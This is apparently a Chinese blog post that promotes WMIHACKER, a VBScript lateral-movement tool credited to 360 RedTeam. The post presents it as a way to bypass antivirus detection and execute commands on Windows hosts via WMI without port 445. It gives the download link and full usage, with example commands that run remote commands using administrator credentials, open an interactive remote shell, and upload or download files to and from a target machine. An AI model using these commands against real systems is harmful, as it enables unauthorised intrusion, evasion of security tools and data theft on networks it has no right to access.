WMIHACKER无需445端口进行横向渗透
WMIHACKER简介
常见的WMIEXEC,PSEXEC工具执行命令是创建服务或调用Win32_Process.create,这些方法已被防病毒软件100%拦截,因此我创建了WMIHACKER(绕过防病毒软件横向移动命令执行测试工具)[不需要445端口]。
主要功能
①命令执行
②文件上传
③文件下载项目地址
GitHub:
https://github.com/360-Linton-Lab/WMIHACKER下载地址
①GitHub: WMIHACKER/archive/master.zip
使用方法
C:\Users\administrator\Desktop>cscript //nologo WMIHACKER_0.6.vbs __ ____ __ _____ _ _ _____ _ ________ _____ \ \ / / \/ |_ _| | | | | /\ / ____| |/ / ____| __ \ \ \ /\ / /| \ / | | | | |__| | / \ | | | ' /| |__ | |__) | \ \/ \/ / | |\/| | | | | __ | / /\ \| | | < | __| | _ / \ /\ / | | | |_| |_ | | | |/ ____ \ |____| . \| |____| | \ \ \/ \/ |_| |_|_____| |_| |_/_/ \_\_____|_|\_\______|_| \_\ v0.6beta By. Xiangshan@360RedTeam Usage: WMIHACKER.vbs /cmd host user pass command GETRES? WMIHACKER.vbs /shell host user pass WMIHACKER.vbs /upload host user pass localpath remotepath WMIHACKER.vbs /download host user pass localpath remotepath /cmd single command mode host hostname or IP address GETRES? Res Need Or Not, Use 1 Or 0 command the command to run on remote host
执行命令后显示结果
> cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo" 1
执行命令后无结果显示[保存为txt]
> cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo > c:\1.txt" 0
shell模式
> cscript WMIHACKER_0.6.vbs /shell 172.16.94.187 administrator "Password!"
文件上传:将本地calc.exe复制到远程主机c:\ calc.exe
> cscript wmihacker_0.4.vbe /upload 172.16.94.187 administrator "Password!" "c:\windows\system32\calc.exe" "c:\calc"
文件下载:将远程主机calc.exe下载到本地c:\calc.exe
> cscript wmihacker_0.4.vbe /download 172.16.94.187 administrator "Password!" "c:\calc" "c:\windows\system32\calc.exe"
温馨提示:本文最后更新于2020年9月22日 22:33,若内容或图片失效,请在下方留言或联系博主。